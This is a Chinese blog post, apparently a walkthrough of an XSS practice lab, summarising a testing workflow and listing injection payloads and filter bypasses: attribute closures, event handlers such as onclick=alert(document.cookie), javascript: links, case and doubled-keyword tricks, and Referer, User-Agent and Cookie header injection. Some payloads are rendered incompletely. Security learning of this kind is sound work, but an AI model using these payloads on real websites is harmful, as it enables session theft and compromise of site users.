xss测试步骤总结

已于 2023-09-28 09:37:14 修改
阅读量1.9k 收藏 7
点赞数
文章标签: xss 前端
于 2023-09-28 09:34:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/133376199
版权

文章目录

测试流程

先看bp
再看回显
测试常规xss语句
接着看F12上下文
然后是构造闭合
最后是依次测试绕过方法
成功的时候要能得到一个可以复现的url

1.开启burp

正常输入看响应包和发送包有没有相同点
在这里插入图片描述

如果没有进入第二步

2.测试常规xss语句

一般选即可,或,或 οnclick=alert(document.cookie)
只用做轮子测试,如果还不行,进入下一步

3.观察回显

比如上一步中输入,输入框回显异常

在这里插入图片描述

4.测试闭合与绕过

Level2

在这里插入图片描述

F12观察输入框位置上下文

可以发现语句存在需要闭合的地方,改成"><img src="javascript:alert(‘XSS’)后语句看起来才正常
在这里插入图片描述

所以轮子应该类似">{javascript}

Level3

">//
在这里插入图片描述

此处使用了htmlspecialchars转义了<>等特殊字符,使得尖括号里的代码不能执行,如果找不到绕过方法,只能执行事件函数,比如onclick,直接结束
&:转换为&
“:转换为”
':转换为成为 ’
<:转换为<

:转换为>
由上可以看出单引号没有转义,可以用它来做闭合

Level4

同上

Level5

发现过滤了on,会在on之间插入_,ri也被过滤
因此只能找不带on和

Level6

这关链接也被过滤,但是可以通过大小写绕过
" oNclick=alert(document.cookie) "
总结:xss不要直接修改页面代码,要在输入框中构造,进而产生url链接

Level7

多写绕过
" oonnclick=alert(document.cookie) "
以此步骤测试,先看bp,再看回显,接着看F12,然后是看闭合,最后是依次测试绕过方法

5.xss绕过方法

1)测试需观察点

浏览器左下角查看器,查找注入点所在代码
burp响应包referer/UA/cookie三处位置看是否在提交包中有对应信息
xss不要直接修改页面代码,要在输入框中构造,进而产生url链接

2)无过滤法

3)">闭合

">

4)单引号闭合+事件函数

’ οnclick=’ alert(“123”);

5)双引号闭合+事件函数

" οnclick=alert(‘123’);"

6)引号闭合+链接

"><a href=javascript:alert(‘xss’)>xss

7)大小写绕过

"><a hRef=javascript:alert(‘xss’)>xss

8)多写绕过

" oonnclick=alert(‘123’);"

9)unicode编码

javascript:alert(‘xss’)
javascrIpt:alert(‘xss’)

10)unicode编码+//注释

javascript:alert(‘xss’)//http://www.baidu.com
javascript:alert(‘xss’)//http://

11)隐藏标签赋值

t_sort=123" type=“” οnclick="alert(‘xss’)

12)referer注入

“ type=”” οnclick=”alert(document.cookie)

13)UA头注入

“ type=”” οnclick=”alert(document.cookie)

14)Cookie注入

“ οnclick="alert(‘xss’) type=”

15)`替换()

16)实体编码绕过

https://www.qqxiuzi.cn/bianma/zifushiti.php

17)–!>注释绕过

注释方式有两种:

只为了拿0day
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【老火柴擦出新火花】利用DNSlog进行更高效率的无回显渗透测试
jklbnm12的博客
07-17 2114
目录0.说在前面0.1.DNSlog工具1.什么是DNSlog2.DNSlog回显原理3.DNSlog通常用在哪些地方3.1.SQL注入盲注3.2.XSS盲打3.3.无回显的命令执行3.4.无回显的SSRF3.5.无回显的XXE(Blind XXE) 0.说在前面 0.1.DNSlog工具 如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可: https://github.com/BugScanTeam/DNSLog 另外我们也可以使用在线平台: http://
安全测试-XSS攻击
qq_42008891的博客
03-08 588
XSS攻击概念介绍,常规XSS攻击测试方法,XSStrike工具介绍及常规测试命令
XSS 攻击的检测和修复方法
Java徐师兄的博客
07-13 2811
XSS 攻击是一种常见和危险的 Web 攻击,开发者需要对输入数据进行过滤和转义,使用安全的编程语言和框架以及安全的数据库操作,采用 CSP 等措施来防止 XSS 攻击。同时,用户也需要注意不要轻易点击不明来源的链接,避免被诱导访问恶意网站,从而保护自己的信息安全。// 去除输入数据中的 HTML 和 PHP 标签 $data = strip_tags($data);
XSS 检测神器:XSStrike 保姆级教程
最新发布
Flag少侠的博客
04-20 2560
用户可以使用自定义的负载进行攻击,这些负载可以根据漏洞的特点进行定制,提高攻击的成功率。
Web安全:XSS漏洞的测试(防止 黑客利用此漏洞.)
热门推荐
网络安全领域___专研者.
03-17 1万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
安全测试xss攻击通用测试用例
m0_70669463的博客
07-05 2015
XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。
XSS 测试
keyongle的博客
06-11 3718
原文转载来自:https://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.htmlWeb安全测试XSSXSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的....
XSS攻击(2), XSS分类, 测试方法, 防御方法, 绕过方法
探测???
10-18 1961
例如,如果一个论坛的帖子内容有经过适当的过滤和转义,攻击者可以发布一个带有恶意脚本的帖子,当其他用户查看该帖子时,恶意脚本会在他们的浏览器中执行。对于XSS的不同类型,使用的渗透测试方法可能会有所不同。:与反射型XSS相似,尝试插入恶意载荷,但在这里,您希望这些载荷能够被存储并在后续的请求中再次呈现给用户。:查找应用程序中的所有地方,可以提交数据并在其他地方再次显示这些数据,例如评论、论坛帖子、用户资料等。恶意脚本被存储在目标服务器上(例如,数据库中),当其他用户访问某些页面时,脚本会被加载并执行。
XSS测试
qq_52016943的博客
07-28 1228
XSS 绕过
web测试总结.zip
10-09
Web测试涵盖了一系列步骤和技术,下面我们将详细讨论其中的关键知识点: 1. **功能测试**:这是最基础的测试类型,验证Web应用的功能是否按预期工作。这包括按钮点击、表单提交、链接跳转等。 2. **兼容性测试**:...
使用Django简单编写一个XSS平台的方法步骤
01-20
总结,构建一个Django驱动的XSS平台涉及理解XSS攻击机制、掌握Django框架的使用以及数据库操作。通过这样的平台,你可以模拟攻击场景,提高对XSS防御的理解,并学习如何保护Web应用免受此类攻击。
系统测试问题总结
03-20
【系统测试问题总结】 在软件开发过程中,系统测试是一个至关重要的阶段,它的目的是验证整个系统是否按照需求规格书的功能和性能要求正常运行。系统测试涵盖了集成测试后的所有组件,包括前端用户界面、后端数据库...
测试 总结 归纳
01-04
首先,测试总结是软件测试过程中的一个重要步骤,它涉及对整个测试周期的回顾,包括测试目标、测试策略、执行的测试用例、发现的问题、修复情况以及未来改进的建议。测试总结的目的在于提高团队的效率,减少重复错误...
搭建XSS平台所需的资料,亲测可用
09-02
三、XSS平台搭建步骤 1. 选择合适的源码:压缩包中的“XSS平台源码”应该包含了一个现成的XSS平台实现,可能包括数据库、用户接口以及模拟漏洞的模块。 2. 环境配置:确保你的服务器或本地环境支持运行该源码,可能...
软件安全测试-Web安全测试详解-XSS攻击
白天像蚂蚁一样工作,晚上像蝴蝶一样生活
12-10 2091
通过该文,可以系统了解xss攻击的原理,测试,防御,无论对手工测试,还是自动化测试都可以很好的根据文章执行。
【应用安全之XSS一】XSS攻击测试以及防御
qq_35789269的博客
02-19 6468
跨站脚本攻击 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script(php,js等)代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的特殊目的。 攻击实例 下面为一个Input标签: <input type="text" value="value"></input> 当用输入值
Web安全系列(三):XSS 攻击进阶(挖掘漏洞)
weixin_33950035的博客
09-18 408
前言 在前些章节 (web安全系列(一):XSS 攻击基础及原理)以及(Web安全系列(二):XSS 攻击进阶(初探 XSS Payload))中,我详细介绍了 XSS 形成的原理以及 XSS 攻击的分类,并且编写了一个小栗子来展示出 XSS Payload 的危害。 目前来说,XSS 的漏洞类型主要分为三类:反射型、存储型、DOM型,在本篇文章当中会以permeate生态测试系统为例,分析网站功...
(27)【xss绕过】一般测试步骤、绕过方法:触发事件、干扰、编码……
04-03 6064
XSS绕过-合集】
XSS测试用例
q908544703的博客
05-28 1970
下载原件地址:链接:https://pan.baidu.com/s/1HQu4daTdxfgTDWAyXUD5lA 提取码:5mw1 在这里插入图片描述
渗透测试工程师学习路线
12-20
渗透测试工程师的学习路线可以分为以下几个步骤: 1. 基础知识学习:首先,你需要掌握计算机网络和操作系统的基础知识。了解TCP/IP协议、网络拓扑、常见的操作系统以及它们的安全特性。 2. 编程语言学习:学习一门编程语言,如Python或者Java。这些语言在渗透测试中非常有用,可以帮助你编写自动化脚本和工具。 3. 渗透测试工具学习:学习使用常见的渗透测试工具,如Nmap、Metasploit、Burp Suite等。了解它们的原理和使用方法,并能够根据需要进行配置和使用。 4. 漏洞分析与利用:学习常见的漏洞类型和攻击技术,如SQL注入、XSS、CSRF等。了解漏洞的原理和利用方法,并能够进行漏洞分析和利用。 5. 渗透测试方法学:学习渗透测试的方法和流程,如信息收集、漏洞扫描、漏洞利用、权限提升等。了解渗透测试的各个阶段和常用的工具和技术。 6. 实战训练:进行实际的渗透测试训练和实践,参与CTF比赛、渗透测试项目等。通过实战训练提升自己的技能和经验。 7. 持续学习:渗透测试是一个不断发展和变化的领域,你需要持续学习和跟进最新的安全技术和漏洞。参加安全会议、阅读安全博客和论坛等可以帮助你保持更新。 总结起来,渗透测试工程师的学习路线包括基础知识学习、编程语言学习、渗透测试工具学习、漏洞分析与利用、渗透测试方法学、实战训练和持续学习。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值